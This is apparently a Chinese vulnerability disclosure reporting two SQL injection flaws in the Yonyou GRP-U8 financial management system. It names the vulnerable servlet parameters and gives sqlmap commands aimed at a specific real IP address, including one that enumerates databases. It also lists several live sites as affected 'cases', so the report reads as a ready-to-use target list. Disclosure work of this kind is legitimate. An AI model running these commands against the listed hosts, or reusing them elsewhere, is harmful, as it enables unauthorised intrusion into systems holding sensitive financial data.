### 简要描述:
用友某重要系统两处高危SQL注射
### 详细说明:
该系统为用友GRP-U8 财务管理软件,涉及到非常多敏感的信息
```
/IMLoginServlet?uid=1&pwd=1
/persionTreeServlet?bmdm=1
```
# SQL注入1
/IMLoginServlet?uid=1&pwd=1
sqlmap.py -u "http://61.139.105.105:8008/IMLoginServlet?uid=1&pwd=1"
[<img src="https://images.seebug.org/upload/201504/18224852cf450d28043305681539b5b3a260b584.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/18224852cf450d28043305681539b5b3a260b584.png)
# SQL注入2
sqlmap.py -u "http://61.139.105.105:8008/persionTreeServlet?bmdm=1"
[<img src="https://images.seebug.org/upload/201504/182250324a298e29f29d2ad7650da5c928b8cb7e.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/182250324a298e29f29d2ad7650da5c928b8cb7e.png)
5个案例:
http://61.139.105.105:8008
http://124.128.96.98:8001
http://www.jmsxc.com:7001
http://210.44.112.101
http://210.41.128.120:8002
http://web72283.5udns.cn
### 漏洞证明:
sqlmap 跑出的数据
sqlmap.py -u "http://61.139.105.105:8008/persionTreeServlet?bmdm=1" --dbs
[<img src="https://images.seebug.org/upload/201504/18225124e55d66a8a80726d5aef6e687b0a0be1e.png" alt="data.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/18225124e55d66a8a80726d5aef6e687b0a0be1e.png)
京公网安备 11010502034610号
暂无评论